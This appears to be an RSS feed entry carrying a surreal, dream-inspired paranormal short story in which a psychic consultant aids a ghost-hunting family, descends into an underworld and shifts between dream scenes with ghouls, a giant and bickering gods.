which generates a burst of electricity used to shine the directional light for a few seconds. The light will reveal ghosts and ghost energy illusions for what they really are. In other words, it will let them see the world the way I can albeit only briefly.&#xA;&#xA;The opening reveals a short drop to a ramp carved out of the asphalt and then the earth and then stone angled gently enough that we needn’t even brace ourselves from falling. The air is warm, buzzing with otherworld energy, filled with the remains of ghosts and other things decaying back into their constituent parts. I see the pieces of their bodies, violently torn, shredded, spread around like wallpaper, like paint, like window dressing. All for our benefit, to keep us comfortable.&#xA;&#xA;Yet these ghosts volunteered for second death. It is the only way their remains would produce warmth instead of bitter cold. I can’t understand it. I know what I’m seeing but why would so many do this. What is so important about the Derringer’s coming down here?&#xA;&#xA;Even with my foresight, even with my other world connections, even with my knowing the boundaries and artifice of this world, I can’t understand it. I can’t see what comes next. I know the ending. I see the ending. But the path is darkness.&#xA;&#xA;What I notice most of all is that, when the end comes, I am not there.&#xA;&#xA;“Be careful,” I advise as I cross a rickety bridge first. “Use the ghost-light. Some of the boards are missing but its enchanted to look whole.”&#xA;&#xA;Tom cranks the handle and tries it out.&#xA;&#xA;“Hmm.”&#xA;&#xA;Tom kneels down and feels where a board was missing but visually seems to be there. His hand slips through.&#xA;&#xA;“You can’t touch them,” he says. “You can feel each step with your foot before you take it.” He tells the rest of the family, “Just go slowly.”&#xA;&#xA;On the other side, I see them feel the way ahead, one plank at a time.&#xA;&#xA;I glance further down the path, seeing how the corridor of stone narrows ahead. It is filled with unsavory ghosts of all kinds, pirates, soldiers, ancient warriors, spirits of things not-human at all. I see them then I don’t see them, then I see them again. Something is trying to blind me.&#xA;&#xA;In the distance is a green glowing village filled with both living humanoids and ghosts seemingly operating together. My vision shifts into their midst. They chant and dance around a black pit, wider than a skyscraper and at least as deep. They call to something sleeping, something to protect them from the family arriving from the surface. They fear the surface. They know what the dead have told them. They know about World Wars and weapons that can atomize cities in a flash. They know about slavery and prisons and courts with twisted laws that protect kings while subjugating the people. They know about great monstrous cities built on the backs of obliterated forests, siphoned waters, pluming world covering smoke that kills their own children. They know of the madness of those who live above them, how we destroy and ruin our world and they fear we are coming for theirs.&#xA;&#xA;The thing that answers them from the pit is so massive that a single eye cannot see it, so through a thousand eyes I peer into the depths and see it rise, a mountain of stony flesh, mouth that could swallow a blue whale, its own eyes burning with heat and intensity. I feel its hunger and its pain. It was sleeping and now it is awake.&#xA;&#xA;They know not what they are waking. They know not what it will do to them or the world above.&#xA;&#xA;I pull back and remember myself, remember my history, remember some of who I really am.&#xA;&#xA;I call to Iškur, Adād, 𒀭𒅎, 𐎅𐎄, I ask for lightning to sate this thing, to feed this creature so it does not eat the world itself. I cannot tell it my name for I have forgotten it, but I beg it to listen, to answer. I beseech it to protect not just this family, not just the fearful creatures dancing to their own doom, but to protect everything.&#xA;&#xA;I call to the old gods, the forgotten gods to save this place for I understand that we were brought here to end it.&#xA;&#xA;That was the purpose.&#xA;&#xA;That was the plan.&#xA;&#xA;I plead to save this reality.&#xA;&#xA;I plead to save this version of Ainara.&#xA;&#xA;The ground glows blue and a river of electricity rushes along the walls to the thing in the pit.&#xA;&#xA;The electricity does not hurt it. Instead it feeds it. The creature gorges and gorges.&#xA;&#xA;I reach into the stream and feel a rush in my veins and nerves, all firing at once, all bubbling and splitting, vibrating and humming. I burn, sizzle, my ears burst and my eyes boil in their sockets.&#xA;&#xA;I hear my laughter echoing.&#xA;&#xA;I see Ainara seeing my body inflate like a balloon in a split second before I explode into a mist.&#xA;&#xA;I hear her weeping, shielding the children, Tom pushing past to see if any of what I was is left.&#xA;&#xA;I feel Paul and not-Paul tugging at each other’s thoughts trying to make sense of what just happened.&#xA;&#xA;But I am no longer there.&#xA;&#xA;I shift sideways.&#xA;&#xA;I’m at the bottom of a carved sandstone staircase that spirals up. Adam and Tom are right behind me. I can hear scrabbling in the distance, yelling, the clashing of steel on steel. Cori and Eri float a few centimeters off the ground, pushing against the air, against the onslaught with all of their considerable telekinetic might.&#xA;&#xA;Adam shouts, “They can’t hold them back forever, T.”&#xA;&#xA;Tom looks up the shaft next to me, “What do you think?”&#xA;&#xA;I feel the entire stairway, heading up. Not the surface, but close. It crosses over into some other place along the way.&#xA;&#xA;“It’s safe. I’ll float up, y’all come behind as fast as you can.”&#xA;&#xA;Tom nods. “Got it.”&#xA;&#xA;He turns back, “Come on!”&#xA;&#xA;I’m already half-way up the shaft, feeling the quality of the air shift from oppressive to open, to something else.&#xA;&#xA;I hear them running and hear the others pursuing behind them.&#xA;&#xA;First Adam, then Tom. As as Cori and Eri make it I use my own abilities to crush the stone stairs, sending them tumbling into the shaft, sealing it and preventing anything from coming up after them, after us.&#xA;&#xA;Tom slaps me on the back and hugs me, “Damn good work, Tarek!”&#xA;&#xA;Adam adds, “Yeah, I’m really glad you thought to call Tarek for this.”&#xA;&#xA;Cori says, “He saved the day for sure.”&#xA;&#xA;Eri says, “He kept us from being taken.”&#xA;&#xA;We’re close to the surface and it’s easy enough to find a path. We weren’t the first to come this far, just the first—in a very long time—to be foolish enough to go any deeper.&#xA;&#xA;I was honestly surprised to get the call from Thomas. I didn’t think I was welcome.&#xA;&#xA;Back at the homestead, I went into the stasis room to see Ainara, frozen twenty years ago after the last time I worked with the family. The unexpected explosion of other worldly energy sucked the life out of her. She’d be dead if not for the sorcerer I found who know how to do this. She wasn’t dead or alive, she was frozen in time.&#xA;&#xA;I didn’t expect them to let me talk to her. Every moment out of stasis was another moment close to death. But I could see her, standing there, immobile. Her missing left eye a reminder of how wrong I was that night.&#xA;&#xA;The twins had snuck up on me. They could do that now.&#xA;&#xA;“She asks about you,” Cori says. Eri adds, “she misses you.”&#xA;&#xA;I knew they brought her out from time to time when they needed her wisdom. I knew the sorcerer had said she would keep trying to find a way to reverse the anti-life damage that had been done to her soul.&#xA;&#xA;I turn to them. “What happened to your dad?”&#xA;&#xA;They look at each other and I feel a thought pass between them, but I can’t decipher it.&#xA;&#xA;“Ask Tom,” Cori says. “Or Adam,” Eri adds.&#xA;&#xA;I leave Ainara and find Tom in the study behind the desk engrossed in a massive, ancient book.&#xA;&#xA;“What’s up, Tarek?” he asks, barely looking up from the tome he’s reading.&#xA;&#xA;“Where’s your dad?”&#xA;&#xA;“Hmm,” he says, then motions for me to sit down across from him.&#xA;&#xA;As I’m sitting he asks, “You remember Dr. Gallagher, right?”&#xA;&#xA;“The one who saved your mom, of course, I remember her.”&#xA;&#xA;“Well, she didn’t have the same luck with dad, unfortunately.”&#xA;&#xA;My heart sinks, “Paul’s gone? I’m so sorry.”&#xA;&#xA;Tom shifts his head left and right.&#xA;&#xA;“He’s not quite gone.”&#xA;&#xA;I shake my head. &#xA;&#xA;“I’ll just show you.”&#xA;&#xA;Tom stands up and leads me out of the study to their trophy room full of artifacts and items picked up in their adventures. It smells of dirt, tree sap, ancient smoke, and libraries full of papyrus.&#xA;&#xA;He points to a chest on a slightly raised section of floor. It’s the size of a steamer trunk.&#xA;&#xA;“Go ahead,” he motions. “Open it.”&#xA;&#xA;The lid is heavier than it looks, resisting as if there is suction or magnetism holding it in place. Finally, it snaps open.&#xA;&#xA;Inside, I see an entire world, like a doorway, hiding a jungle. Birds caw, large things stumble in the distance, but the smell is dank, cemetery, rotten.&#xA;&#xA;“Tom,” croaks a broken voice. “Adam?”&#xA;&#xA;Something shambles into view below the portal, brown, ragged, covered in leaves and dripping worms and worse.&#xA;&#xA;“Tarek? Well, I’ll be,” it groans.&#xA;&#xA;I see blue eyes buried somewhere in the hideous face and hints of a smile behind the rictus grin.&#xA;&#xA;“Paul?”&#xA;&#xA;It can’t be. But it is.&#xA;&#xA;“What happened?”&#xA;&#xA;“Thought I’d found a way to bring Ainara back,” he rasps.&#xA;&#xA;“I was wrong.”&#xA;&#xA;He shuffles for a moment, looking away, looking at his hands.&#xA;&#xA;I don’t know what to say. I don’t know what to think.&#xA;&#xA;He looks back up.&#xA;&#xA;“If you get a chance to talk to her, Tarek. If you find a cure for her.”&#xA;&#xA;He looks directly into my eyes.&#xA;&#xA;“Well, you have my blessing.”&#xA;&#xA;Then he shuffles out of view.&#xA;&#xA;I’m still staring when Tom closes the lid.&#xA;&#xA;He puts his arm around my shoulder.&#xA;&#xA;“It’s an undead world down there, Tarek. I mean a world where the undead thrive and the living are endangered.”&#xA;&#xA;He pulls me away.&#xA;&#xA;“Dad is safe there, more than safe.”&#xA;&#xA;At dinner, they bring out dish after dish, meat and potatoes, meat covered in cheeses, meat in exotic sauces.&#xA;&#xA;I’m still struck by what I saw through the portal in that chest and can’t even think of food.&#xA;&#xA;My mind wanders, distracted, distraught. I can’t focus. I can’t think.&#xA;&#xA;What was Paul thinking to end up like that? What did Dr. Gallagher do to him? Why was that the only option?&#xA;&#xA;Something slips and my perception fully crosses into the other, something that never happens on its own. I have to will it and I certainly did not will it.&#xA;&#xA;I see the banquet before me as it really is. None of the meat is cooked. It is raw. It is fresh.&#xA;&#xA;Tom, Adam, Cori, and Eri are no longer human. I see them as the ghouls they have become.&#xA;&#xA;The girls smile at me with lipless grins. “We see you,” they say in unison.&#xA;&#xA;I pull my sight back but still see them, still see the reality.&#xA;&#xA;Tom’s head is grotesque, held together by wires and metal staples.&#xA;&#xA;“Tarek! You get to join us. Mom insisted.”&#xA;&#xA;It’s not clear how Tom manages to speak at all, but that was his voice coming from his head.&#xA;&#xA;Adam slides in with, “She didn’t want to leave you behind after we head in after dad.”&#xA;&#xA;Cori says, “Dr. Gallagher is already waiting for us.”&#xA;&#xA;Eri says, “This is the way to cure mom, what dad almost got right.”&#xA;&#xA;I swoon, my head spinning, trying to grasp what they are doing, what they are asking me to do.&#xA;&#xA;The world closes in, becomes a pinpoint of light and everything goes dark.&#xA;&#xA;I sit in a cavern much like the one from before, but there are no ghosts here, just cowering warriors and their shield maidens before them.&#xA;&#xA;I sit because the caves are too narrow for me to stand. At 7 meters tall, I tower over even the tallest among them.&#xA;&#xA;I see the arena in the distance and kneel to shuffle toward it. I will fight them there. I will fight them all.&#xA;&#xA;I long to see if Benttite flesh is as tender and sweet as was their rivals, the Amelonians.&#xA;&#xA;I grunt and crawl until the cavern opens up for the arena. It was filled with fighting men and women, sparring and competing.&#xA;&#xA;“I come to fight,” I tell them, my booming voice echoing off the stone walls. “I come to fight in your legendary arena where the pinnacle of human strength, strategy, and fitness strive to best one another.”&#xA;&#xA;Alas, when the gate swings open, the arena is empty, all warriors having fled in my wake save one who does not seem the fighting type.&#xA;&#xA;“My Lord,” he addresses me, kneeling and breaking eye contact. “Instead of combat, perhaps you would prefer a different style of conquest.”&#xA;&#xA;He motions toward another exit and I see healthy men and women in little clothing eyeing me with half smiles and curiosity. I scent them immediately and understand the offer.&#xA;&#xA;Although I cannot fully honor it, I am moved by their humility.&#xA;&#xA;I nod to the little man and move toward the harem, my mutilated manhood doing its best to prepare for the experience.&#xA;&#xA;They appease me. They indulge me by performing with each other. I see methods of pleasure and how to both delay and prolong it that are truly inspirational.&#xA;&#xA;All the while I am plied with exotic foods of which I have never tasted, cooked and uncooked meats of varying shapes, strange fruits and vegetables, and drink with flavours the likes of which I had never encountered.&#xA;&#xA;Each time I am approached to join in their sexual proclivities, I redirect the man or woman back to the throng, to show me something new, some other act forbidden by all the gods of the surface world and I am never disappointed.&#xA;&#xA;I had heard of their prowess in war and battle but not of this, not of their creative depravity in the realms of sex or of their artistic skill with meal preparation. I supposed the renowned Benttite generals, soldiers, archers, and reavers must be fighting for something. Why not this?&#xA;&#xA;After much gentle prodding, I finally show them my sex. I lift my furs and reveal to them what curse befell me.&#xA;&#xA;My great size was a boon granted by a god whose name I was never taught. But to keep me from bringing about a great race to challenge those gods, I was hobbled.&#xA;&#xA;My penis is wide as an oak tree yet as short as a what remains after one is felled and what skin it does have is covered in yellow pustules filled with unsavory fluids.&#xA;&#xA;“It has always been thus,” I assure the awestruck audience.&#xA;&#xA;Several among them assuage me they have the finest doctor’s in the known world and that would be honoured to treat me and find a cure.&#xA;&#xA;Again, I am touched by how they treat me, a giant who had come to find pleasure in killing and eating their best while their blood still ran hot.&#xA;&#xA;I consider their words as I am overcome by weariness and lose consciousness. I cannot know if I will survive the night, if their hospitality is genuine or a trick of their vaunted intelligence.&#xA;&#xA;“I’m don’t know what the problem is, Sol,” I say, standing on a pearlescent balcony overlooking the black sky. “I had a fine time down there. You think it’s done? Kaput?”&#xA;&#xA;I walk back into Sol’s workshop. He stands or maybe sits. It’s hard to tell with him. He stits holding the rough-shaped platter up at arm’s length, eyeing it with a grimace, squinting.&#xA;&#xA;“I think it’s garbage, Jove.” He shrugs. “I should just eat the whole thing and get it over with.”&#xA;&#xA;“Wait a second, Sol.” I’m trying to save it. I’m trying to save her.&#xA;&#xA;“Stick it in the void. Let them stew on it. Let them see if they can figure out that there is no other world but theirs, that everything they need just happens to be there when they need it. See if they can look beyond it and ascend.”&#xA;&#xA;Sol is rolling his eyes, shrugging, throwing up his hands, but saying nothing.&#xA;&#xA;“Talk if you want to talk,” I shout.&#xA;&#xA;“Bah, you never listen when I do,” he yells back.&#xA;&#xA;“Stick it in the freezer then,” I shrug. “Come back to it later.”&#xA;&#xA;We both know “later” means “never” but I said what I said.&#xA;&#xA;“How many freezers do you have, Sol?”&#xA;&#xA;He waffles before muttering, “three.”&#xA;&#xA;“Three? That’s not bad!”&#xA;&#xA;A chorus of voices rises up from the blackness that surrounds us, “three thousand.”&#xA;&#xA;“Hah,” I laugh. “That’s sounds more like you than three.”&#xA;&#xA;“What does that mean?” he gestures while tossing the world stone to the side.&#xA;&#xA;“You never finish anything but you can’t throw it away either.”&#xA;&#xA;He’s still muttering, “never finish anything, you should see what I’m building, what I’ve found.”&#xA;&#xA;He’s definitely standing up now, but still not any taller.&#xA;&#xA;“Come with me!” he demands.&#xA;&#xA;I follow after him, looking down at his starry crown. Was he always this short? Was he always this bald?&#xA;&#xA;The golden jeweled staircase of light leads to the basement where the floor itself is torn up.&#xA;&#xA;“You ripped up your own floor?” I ask, putting my hands on my hips.&#xA;&#xA;“Look underneath you old fool!” he calls.&#xA;&#xA;I see it now, a silver stream leading off into the infinite night. Big enough for a toy boat if we had a toy boat.&#xA;&#xA;Standing next to it, I can hear a shimmering trickle, a hint at consciousness, novelty.&#xA;&#xA;I see a broken up chair built into a crude boat, barely big enough to stand in.&#xA;&#xA;Sol and Jove argue.&#xA;&#xA;Jove asks me, by name, by my real name, a name I had forgotten.&#xA;&#xA;“Jessica,” he says. “Why don’t you get us in that boat.”&#xA;&#xA;I thought I was Jove. I look down and see Jove’s body: a tall old white man in flowing saffron robes.&#xA;&#xA;I have our body step into the shell of the boat made from a chair.&#xA;&#xA;I slip our feet under a little overhang to keep us from falling. It clamps down gently.&#xA;&#xA;“Do you need to tell Sol about me or… whatever?” I ask inside Jove’s head in my voice, not his.&#xA;&#xA;Jove doesn’t answer. He’s still arguing with his old friend.&#xA;&#xA;The boat shudders and starts to move away from the shore.&#xA;&#xA;I have our body sit down, against the back of the chair, now a small platform, so we don’t rock the boat and fall out as we see where it leads us next.&#xA;&#xA;---&#xA;&#xA;#WhenIDream #Dreams #Dreaming #Dreamlands #Writer #Writing #Writers #WritingCommunity #WritersOfMastodon #ShortFiction #Fiction #Paranormal ]]&gt;</description>
      <content:encoded><![CDATA[<p>I feel my peaceful breathing, the heavy blankets on top of me. I open my eyes, expecting to see my wife beside me, reading a book by lamplight. Instead, I’m alone in a single bed under layers of fur comforters.</p>

<p>I can see my breath in the dim, reddish light. I look around.</p>

<p>No other furniture, a backpack, shoulder bag, and pile of folded clothes on the floor against the wall to my right. I sit up and see a short stack of spiral notebooks next to it: my life’s work. It’s always with me as I have no permanent address.</p>

<p>I look up at the wall near the ceiling. Emergency lights. The <em>only</em> lights.</p>

<p>Slowly the <em>sound</em> comes in.</p>

<p>First, my steady breathing.</p>

<p>Next, the stillness.</p>

<p>Dripping, creaking, distant muffled voices.</p>

<p>A laugh.</p>

<p>I remember who I am.</p>

<p>A <em>consultant</em> brought in by the mystery solving Derringer family. More Scooby-Doo than Supernatural, <em>despite</em> the name. Not that they would understand <em>either</em> of those references.</p>

<p>This is the abandoned hotel next to the old haunted <em>Gilded Djinn</em> amusement park. They got the generator working so they could live here while studying the place.</p>

<p>The dad was possessed. They didn’t know it. The ghost of a Parisienne serial killer put to death in 1938 had possessed him shortly after they got here three weeks ago. The ghost of a child, dead since 1953, told me about it last night. Even though I can see them, the child was but a wisp, a pink sparkling cloud in the shape of a skull. She&#39;d been trying to reach me for days, but the serial killer was <em>strong</em> and suppressed, <em>repressed</em>, the others, hid itself plainly behind living flesh in a way that even I hadn’t noticed.</p>

<p>She can’t tell me her name. Maybe she doesn’t remember it. I call her <em>Papillon</em> because her fluttering colors remind me of a butterfly and she seems to like that.</p>

<p>She could only whisper and hint as to say more courts his attention, but I understood last night. I was supposed to stop him from killing again as he’d taken a secret mistress from town. They were never good enough. No matter how hard he tried to raise them from their station. No matter what he bought them, no matter how he lavished them. No matter what he did to <em>educate</em> them. They were all beneath him and they wasted his time and his affection. Again and again. They were so worthless that killing them was a mercy, the kindest thing he could do for them.</p>

<p>And the body he wore while doing it? Well, they should have had a stronger will than his own, shouldn’t they? The flesh is weak and he is most definitely <em>not</em> weak. Let them sort it out if they can. They swagger around in warmth, wearing blood and sweat; smelling, touching, <em>feeling</em>. Let them figure out what happened, why they went mad. If, with their vaulted senses and biological faculties, they were unable to ferret him out, then they <em>deserved</em> their fates.</p>

<p>I shrug off the covers, invigorated by the chill, breath deeply.</p>

<p>Mildew, moisture, decay. For some reason, I grin.</p>

<p>I slide around and step out of bed.</p>

<p><strong>SQUISH</strong></p>

<p>Shivering ice shoots up my legs all the way to my shoulders.</p>

<p>I remember the dripping sound, whip my head to the inside wall.</p>

<p><strong><em>drip</em></strong></p>

<p>Rivulets of water from the room above running down the wall.</p>

<p>I “see” the room, the father smiling at a strange brunette woman in a steamy bathroom. Behind his eyes, I see another set of eyes, greedy, indolent, and apathetic.</p>

<p>Papillon floats out of my head.</p>

<p>“sorry,” she whispers, a voice closer to my ear than her floating form appears.</p>

<p>I feel her shame at invading my space but there was no violation.</p>

<p>“Don’t be. It was far more expedient to show me than to try to tell me.
“When?”</p>

<p>Time is elusive to a ghost. Being detached from a body’s signals and urges leaves one prone to missing days or weeks at a time.</p>

<p>A quiver passes through her. “i stayed aware so it must only be hours”</p>

<p>“So he’s close to finishing the act, then?”</p>

<p>She hesitates. I can feel her reaching out, testing the air, probing for his eyes.</p>

<p>“yes” she finally whispers.</p>

<p>I slosh over to my belongings, now sitting in two centimeters of water.</p>

<p>I look down at myself, a young adult man, black; thin, but well-built; wearing loose sleep pants and boxer shorts. No shirt.</p>

<p>I kneel down to check my fresh clothes. Even the top ones are damp.</p>

<p>I glance at my other belongings.</p>

<p>My eyes go wide in panic. My heart pounds and my ears ring.</p>

<p><em>My notebooks.</em></p>

<p>I gently touch the top.</p>

<p>Wet.</p>

<p>My vision goes red and my teeth grit, grinding so hard my jaw hurts.</p>

<p>At the same time, tears well and begin to spill.</p>

<p>I gingerly scoop them up and place them on top of the covers on the bed, afraid to spread them out and risk further damage.</p>

<p>Thirty years of notes, observations, dreams, musings, philosophy, journaling, secrets.</p>

<p>My heart sinks to my stomach.</p>

<p>So many memories.</p>

<p>Hands in fists, nails digging into my palms, tears rolling down my face, breathing in ragged bursts.</p>

<p>“I will kill him,” I think, seeing the desiccated, skeletal form of the ghost riding Paul Derringer, using his body for pleasure and murder. “I will rip him from the body, tear him into strips, and swallow them one at a time while he wails in horror.”</p>

<p>How does one kill a ghost? I know how yet rarely have I done it.</p>

<p>I will <em>relish</em> killing him. I will bask in his suffering as I eat his essence.</p>

<p>Shocked at my own thoughts, I try to calm myself, try to slow my breathing, control my pulse.</p>

<p>Papillon nudges me over and over.</p>

<p>She cannot see me like this.</p>

<p>I look at her but can’t speak.</p>

<p>A page from my notebook floats in the air, deftly separated from the rest without damage.</p>

<p>It sparkles with Papillon’s light, flattens, dries, without smearing the ink further, without tearing or ripping, without sticking to the other pages.</p>

<p>Moments later, the dry, clean page floats to the bed and another appears and undergoes the same methodical process.</p>

<p>She can rescue them. She can save my past.</p>

<p>My tears switch to those of relief, joy and mostly, of gratitude.</p>

<p>I nod to Papillon.</p>

<p>My blue jeans will be far to wet, even for an industrious little ghost. The sleep pants will suffice. My boots will be fine as the water was not deep enough to rise up over the rubber.</p>

<p>The closet still has the dusty old outfits of the last person to stay here. I find a shirt only a size or two too large.</p>

<p>Time is slipping, so this must be good enough.</p>

<p>The family waits for me outside.</p>

<p>Paul grins as if he knows that I know. “About time, Tarek. We thought maybe you’d taken a sleeping pill. Not sure how you slept through the commotion.” He’s fit for his age, effortlessly athletic and buoyant. Before the ghost indwelling, his generosity and kindness were overflowing. Now he prefers sarcasm and backhanded compliments.</p>

<p>The sleeping pill reference tells me what he did with the woman I saw in my vision.</p>

<p>Ainara, the mother, weary and weathered, smiles purely. Even beneath the hard years, of chasing ghosts, of raising four children, her deep alluring elegance seeps through. In another life, I would have courted her, married her, and kept her far away from this nonsense, forgoing even my own natural gifts so that I might spend all my efforts giving her everything she ever needed.</p>

<p>Adam, the oldest brother was away on his own investigation, leaving barely 18 Tom and the twin teenage girls, Cori (Corinna) and Eri (Erinna), named after Greek poets. The girls were destined to get their own spin-off set of adventures, that was obvious. Tom would have his own, as well soon enough. After Adam disappears during his investigation in the Appalachians in the coming months leading such that Tom sets off to find him.</p>

<p>The parents would retire into the background, showing up for the sake of nostalgia and for frequent flashbacks and phone calls for guidance.</p>

<p>But this story was to be the crowning achievement of the family as a unit, the last time they all worked together, save Adam whose absence sets up the next series. This was high stakes, lives on the line, pulling out all the stops. The possession of Paul was telegraphed far earlier to those who had been paying attention, long before I was brought in as a cross-over character.</p>

<p>They stand around a glowing hole in the parking lot leading down into the earth. It had not been there the night before.</p>

<p>Smoke or steam rises from it and it glows with red light, similar to the emergency lights in the hotel.</p>

<p>“That opened up last night?” I ask.</p>

<p>“The storm?” Ainara asks. “The air rang like collapsing steel for hours behind a wall of black water.”</p>

<p>Cori adds, “there was no lightning.” Then Eri, “but plenty of thunder.”</p>

<p>Tom shakes his head, hands on his hips. “I don’t like it.” He motions toward me. “T, come take a look, please. Let us know what you see.”</p>

<p>I nod and walk over, letting my vision fade in and out of this world and the other.</p>

<p>In the other, I see pale, glowing tumbleweeds drifting and flowing toward the hole, not fast, not a torrent, but it is like a drain has been opened into the other world and any ghost form or related energy not firmly connected is being drawn back toward it.</p>

<p>I think about Papillon and how she was eager to repair my notebooks wondering if she was seeking something to keep her attached for just a little while longer.</p>

<p>“It’s an opening into the other world,” I tell them plainly. “Give it time and it will clean up the infestation at <em>Gilded Djinn</em> all on its own.”</p>

<p>Paul immediately interrupts. “But then we’ll never know what caused it. We have to go in. We have to figure this out.”</p>

<p>Ainara stares at Paul, holding her mouth steady, squinting at him, but saying nothing.</p>

<p>Tom, newly a man, counters, “Dad. We are not prepared for this. We do not have equipment for spelunking, certainly not into the freaking <em>other world</em>.”</p>

<p>The girls, who I know have underdeveloped psychic powers of their own, glance at the hole and at each other, sharing a conversation only they can hear. I know they want to go inside. I know they want to go inside and are <em>afraid</em> of the fact that they want to go inside. I know they will be pushed to the brink and the struggle to save their family will enable their psychic powers to burst through.</p>

<p>I know that hole is more than just a portal to the other world. I know we are <em>expected</em> down there. There are long-gestating plans finally coming to fruition. Entire bloodlines worked toward this day.</p>

<p>We will go down into the hole.</p>

<p>We must.</p>

<p>Paul looks at me. “Tarek can help us see our way, right?”</p>

<p>I lick my lips, rub my chin, feel the inevitability, the <em>pull</em> of the narrative.</p>

<p>“I will do my best, Paul. I will keep you safe.” It’s a lie, but a necessary one.</p>

<p>So, after Paul loans me a pair of pants and I go change, after I gather a few trinkets from my belongings that might help us, an antique ghost-light, a handful of protective carvings, a bracelet for each of the twins and for Ainara.</p>

<p>Tom has the globular, gold, tin, silver, copper, and glass ghost-light. I demonstrate how you squeeze the mechanism on the side, it spins a dynamo inside which generates a burst of electricity used to shine the directional light for a few seconds. The light will reveal ghosts and ghost energy illusions for what they really are. In other words, it will let them see the world the way I can albeit only briefly.</p>

<p>The opening reveals a short drop to a ramp carved out of the asphalt and then the earth and then stone angled gently enough that we needn’t even brace ourselves from falling. The air is warm, buzzing with otherworld energy, filled with the remains of ghosts and other things decaying back into their constituent parts. I see the pieces of their bodies, violently torn, shredded, spread around like wallpaper, like paint, like window dressing. All for our benefit, to keep us comfortable.</p>

<p>Yet these ghosts <em>volunteered</em> for second death. It is the only way their remains would produce warmth instead of bitter cold. I can’t understand it. I know what I’m seeing but why would so many do this. What is so important about the Derringer’s coming down here?</p>

<p>Even with my foresight, even with my other world connections, even with my knowing the boundaries and artifice of this world, I can’t understand it. I can’t see what comes <em>next</em>. I know the ending. I <em>see</em> the ending. But the path is darkness.</p>

<p>What I notice most of all is that, when the end comes, I am not there.</p>

<p>“Be careful,” I advise as I cross a rickety bridge first. “Use the ghost-light. Some of the boards are missing but its enchanted to look whole.”</p>

<p>Tom cranks the handle and tries it out.</p>

<p>“Hmm.”</p>

<p>Tom kneels down and feels where a board was missing but visually seems to be there. His hand slips through.</p>

<p>“You can’t touch them,” he says. “You can feel each step with your foot before you take it.” He tells the rest of the family, “Just go slowly.”</p>

<p>On the other side, I see them feel the way ahead, one plank at a time.</p>

<p>I glance further down the path, seeing how the corridor of stone narrows ahead. It is filled with unsavory ghosts of all kinds, pirates, soldiers, ancient warriors, spirits of things not-human at all. I see them then I don’t see them, then I see them again. Something is trying to blind me.</p>

<p>In the distance is a green glowing village filled with both living humanoids and ghosts seemingly operating together. My vision shifts into their midst. They chant and dance around a black pit, wider than a skyscraper and at least as deep. They call to something sleeping, something to protect them from the family arriving from the surface. They fear the surface. They know what the dead have told them. They know about World Wars and weapons that can atomize cities in a flash. They know about slavery and prisons and courts with twisted laws that protect kings while subjugating the people. They know about great monstrous cities built on the backs of obliterated forests, siphoned waters, pluming world covering smoke that kills their own children. They know of the madness of those who live above them, how we destroy and ruin our world and they fear we are coming for theirs.</p>

<p>The thing that answers them from the pit is so massive that a single eye cannot see it, so through a thousand eyes I peer into the depths and see it rise, a mountain of stony flesh, mouth that could swallow a blue whale, its own eyes burning with heat and intensity. I feel its hunger and its pain. It was sleeping and now it is awake.</p>

<p>They know not what they are waking. They know not what it will do to them or the world above.</p>

<p>I pull back and remember myself, remember my history, remember some of who I really am.</p>

<p>I call to Iškur, Adād, 𒀭𒅎, 𐎅𐎄, I ask for lightning to sate this thing, to feed this creature so it does not eat the world itself. I cannot tell it my name for I have forgotten it, but I beg it to <em>listen</em>, to <em>answer</em>. I beseech it to protect not just this family, not just the fearful creatures dancing to their own doom, but to protect <em>everything</em>.</p>

<p>I call to the old gods, the forgotten gods to save this place for I understand that we were brought here to end it.</p>

<p>That was the purpose.</p>

<p>That was the plan.</p>

<p>I plead to save this reality.</p>

<p>I plead to save this version of Ainara.</p>

<p>The ground glows blue and a river of electricity rushes along the walls to the thing in the pit.</p>

<p>The electricity does not hurt it. Instead it feeds it. The creature gorges and gorges.</p>

<p>I reach into the stream and feel a rush in my veins and nerves, all firing at once, all bubbling and splitting, vibrating and humming. I burn, sizzle, my ears burst and my eyes boil in their sockets.</p>

<p>I hear my laughter echoing.</p>

<p>I see Ainara seeing my body inflate like a balloon in a split second before I explode into a mist.</p>

<p>I hear her weeping, shielding the children, Tom pushing past to see if any of what I was is left.</p>

<p>I feel Paul and not-Paul tugging at each other’s thoughts trying to make sense of what just happened.</p>

<p>But I am no longer there.</p>

<p>I shift sideways.</p>

<p>I’m at the bottom of a carved sandstone staircase that spirals up. Adam and Tom are right behind me. I can hear scrabbling in the distance, yelling, the clashing of steel on steel. Cori and Eri float a few centimeters off the ground, pushing against the air, against the onslaught with all of their considerable telekinetic might.</p>

<p>Adam shouts, “They can’t hold them back forever, T.”</p>

<p>Tom looks up the shaft next to me, “What do you think?”</p>

<p>I feel the entire stairway, heading up. Not the surface, but close. It crosses over into some other place along the way.</p>

<p>“It’s safe. I’ll float up, y’all come behind as fast as you can.”</p>

<p>Tom nods. “Got it.”</p>

<p>He turns back, “Come on!”</p>

<p>I’m already half-way up the shaft, feeling the quality of the air shift from oppressive to open, to something else.</p>

<p>I hear them running and hear the others pursuing behind them.</p>

<p>First Adam, then Tom. As as Cori and Eri make it I use my own abilities to crush the stone stairs, sending them tumbling into the shaft, sealing it and preventing anything from coming up after them, after us.</p>

<p>Tom slaps me on the back and hugs me, “Damn good work, Tarek!”</p>

<p>Adam adds, “Yeah, I’m really glad you thought to call Tarek for this.”</p>

<p>Cori says, “He saved the day for sure.”</p>

<p>Eri says, “He kept us from being taken.”</p>

<p>We’re close to the surface and it’s easy enough to find a path. We weren’t the first to come this far, just the first—in a very long time—to be foolish enough to go any deeper.</p>

<p>I was honestly surprised to get the call from Thomas. I didn’t think I was welcome.</p>

<p>Back at the homestead, I went into the stasis room to see Ainara, frozen twenty years ago after the <em>last</em> time I worked with the family. The unexpected explosion of other worldly energy sucked the life out of her. She’d be dead if not for the sorcerer I found who know how to do <em>this</em>. She wasn’t dead or alive, she was frozen in time.</p>

<p>I didn’t expect them to let me talk to her. Every moment out of stasis was another moment close to death. But I could see her, standing there, immobile. Her missing left eye a reminder of how <em>wrong</em> I was that night.</p>

<p>The twins had snuck up on me. They could do that now.</p>

<p>“She asks about you,” Cori says. Eri adds, “she misses you.”</p>

<p>I knew they brought her out from time to time when they needed her wisdom. I knew the sorcerer had said she would keep trying to find a way to <em>reverse</em> the anti-life damage that had been done to her soul.</p>

<p>I turn to them. “What happened to your dad?”</p>

<p>They look at each other and I feel a thought pass between them, but I can’t decipher it.</p>

<p>“Ask Tom,” Cori says. “Or Adam,” Eri adds.</p>

